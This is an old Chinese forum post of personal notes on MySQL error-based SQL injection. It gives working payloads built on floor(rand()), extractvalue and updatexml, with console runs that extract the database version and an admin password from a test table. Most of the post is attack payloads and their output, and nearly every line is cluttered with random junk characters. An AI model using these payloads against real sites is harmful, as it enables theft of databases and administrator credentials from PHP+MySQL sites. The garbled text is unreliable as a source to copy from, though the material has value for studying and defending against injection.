放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。3 T, F- t7 Q4 U$ ~# ^
实际测试环境:% \. o& p$ m4 Q2 J
9 @$ {! q" x% q; C9 ]( M) l
/ b; v& q* B7 v4 g: G9 xmysql> show tables;' [- e2 W. F. n9 ` Y
+----------------+
/ d7 `/ a* i! `% @7 k| Tables_in_test |4 F# ~5 e9 m7 \- ?) @
+----------------+
# h! M8 X/ _9 ^7 F& }( v$ p: r| admin |! G- M/ R" c% f2 Q8 t
| article |
$ `- B* P1 i/ t# g% G3 N; D3 v1 x) d+----------------+
3 A9 X+ L2 s8 i/ _. L5 O+ B
4 [7 i$ ~# S# z% s- ] + }, J3 F) M1 S) S
- [. h2 a, p. c. j0 l3 t
mysql> describe admin;
5 ?/ b* l- F% N/ Z+-------+------------------+------+-----+---------+----------------+
6 J. {- {# } a' V1 ^# ~& [& j| Field | Type | Null | Key | Default | Extra |
$ S* L1 Y }0 ]! `+-------+------------------+------+-----+---------+----------------+
/ S/ _! T. ^" N- t| id | int(10) unsigned | NO | PRI | NULL | auto_increment |+ u8 m% O G/ B
| user | varchar(50) | NO | | NULL | |
# {6 d, {- j4 s! p& `2 |7 n| pass | varchar(50) | NO | | NULL | |% M0 r% s! {1 m% V
+-------+------------------+------+-----+---------+----------------+
& t4 y" f6 v, W, M z' M ^5 ^1 ^, K7 p Z5 b5 e
5 Z3 R: K' ~' r: j" q ) U1 T @1 m0 e. Z% |' `
mysql> describe article;; \$ o0 W' P5 y9 J* I; f/ H. J
+---------+------------------+------+-----+---------+----------------+9 o; n/ ]( i. W9 D: {; h
| Field | Type | Null | Key | Default | Extra |
" _+ V! ^. s: J* R8 Y$ Q7 E1 ~+---------+------------------+------+-----+---------+----------------+( P! D: ?5 i7 _
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |. z4 X6 V+ l( v
| title | varchar(50) | NO | | NULL | |
& {7 M6 ]3 o5 H) H4 W4 P6 L| content | varchar(50) | NO | | NULL | |
7 z* l4 U$ p |* n- t) F1 c+---------+------------------+------+-----+---------+----------------+
1 G4 y7 l- e0 c' {& z7 k1、通过floor报错
$ d [7 R% ?$ _% [可以通过如下一些利用代码
3 b; }) o" O' S: Z/ I; a! F# r - f8 X6 B' [+ g9 z) j S! K( s
9 A& i6 u# N/ h9 _( R' \$ H$ `
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
5 r- l/ ]1 Z( s: i9 ^; Rfrom information_schema.tables group by x)a);" J" k4 W: P. p/ a" P5 p
0 J* O1 A6 |1 M& f. M* H& r
0 m+ G% Y' @7 Band (select count(*) from (select 1 union select null union select !1)x. Y$ S) M0 F% j9 x
group by concat((select table_name from information_schema.tables limit 1),; @2 h U% s# o! B" r2 G# r
floor(rand(0)*2)));
$ V& q' o A: w举例如下:
* w6 u7 @8 |+ g7 d" `8 V3 U首先进行正常查询:/ E+ ~+ s. ]0 Q* g! K! ~
( J- p( R# v( ]' O8 jmysql> select * from article where id = 1;3 \' J$ S* L. R c2 \
+----+-------+---------+- G2 D! C% O3 O s, h
| id | title | content |
! |; r3 [5 v3 p+----+-------+---------+
9 n3 B" s) _2 w/ g| 1 | test | do it |
9 S/ s9 @7 ^) e5 Z9 u6 C `+----+-------+---------+
4 l& \ N2 ?4 ^ _+ ]0 O假如id输入存在注入的话,可以通过如下语句进行报错。8 K% a! X) \/ ^# s
2 [+ H9 k+ D1 H( H
/ f5 W7 @3 W4 `+ umysql> select * from article where id = 1 and (select 1 from
; l1 _$ x4 A! F(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);% {3 h0 T/ E1 ?) ~. K
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'" S# ?$ ^6 B6 S' x. Y
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。. K2 Y7 _+ S; [0 v7 H
例如我们需要查询管理员用户名和密码:' g. h7 b+ W* t# \6 o
Method1:5 h- e6 L; b1 N* |
, r& Z% _. W; L- ~ 1 C+ j/ j7 r/ Y3 m
mysql> select * from article where id = 1 and (select 1 from, {/ r$ a' y5 | B
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x* |6 j: q$ g% a6 ~* g
from information_schema.tables group by x)a);
; v5 n3 q* @6 WERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
0 p* [$ \8 s0 }) S) JMethod2:
* P- y1 i8 t% l. t" Y
5 X% |1 o9 I5 b: v $ f2 b0 X: B$ ?2 q
mysql> select * from article where id = 1 and (select count(*)
# t& h; j5 L) sfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
; r) R" R6 i5 z: Vfloor(rand(0)*2)));
1 o# p! x3 D" H% c5 b6 EERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'. A& F& k1 }; T( i, X7 {- ?0 C2 F9 }
2、ExtractValue
: `; C8 p' ]/ [+ z& J测试语句如下 U* K# ? p- e5 K) v
% e3 I% \( h: Q8 K& E d/ E) y
, h8 X% _" s3 M- N: \3 |2 E! yand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));1 \9 I _. z% w
实际测试过程( B* W1 a6 E+ `/ j: D
$ r' k% L( y4 m: f2 ^* R: G3 z0 G, l
/ m% ~+ E8 h1 cmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
2 a" Y) |/ W* B+ ^* T(select pass from admin limit 1)));--
5 |0 |" `, c" M2 aERROR 1105 (HY000): XPATH syntax error: '\admin888'# E1 @; ]( b2 k& g) n/ Y0 t5 y; K$ ~
3、UpdateXml
( w( P8 ]8 W0 K3 ]1 ^# |测试语句
- ^* m/ v% w# C* k) h
1 G' @- ^; z7 s/ w! O, u 9 h! B- v5 {" `) A) _
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
9 Q+ i; x7 L$ K% e: S. f) r7 U实际测试过程
, L0 n$ T8 [: p- r" E . C' t) ], w w1 l3 Z1 V
- p% V ]! I* F3 t: T) P6 T
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
1 m5 G$ V" s% p(select pass from admin limit 1),0x5e24),1));* V/ ]" f6 T) j& \( ?+ _
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
R9 x ^7 U! lAll, thanks foreign guys.2 v+ N) a8 @0 U/ \9 ^! I" H: e
( \, ^( z2 p6 m
( |/ M/ {6 _2 ^& g, Z- Q |
发表于 2012-12-10 10:28:51
收藏
支持
反对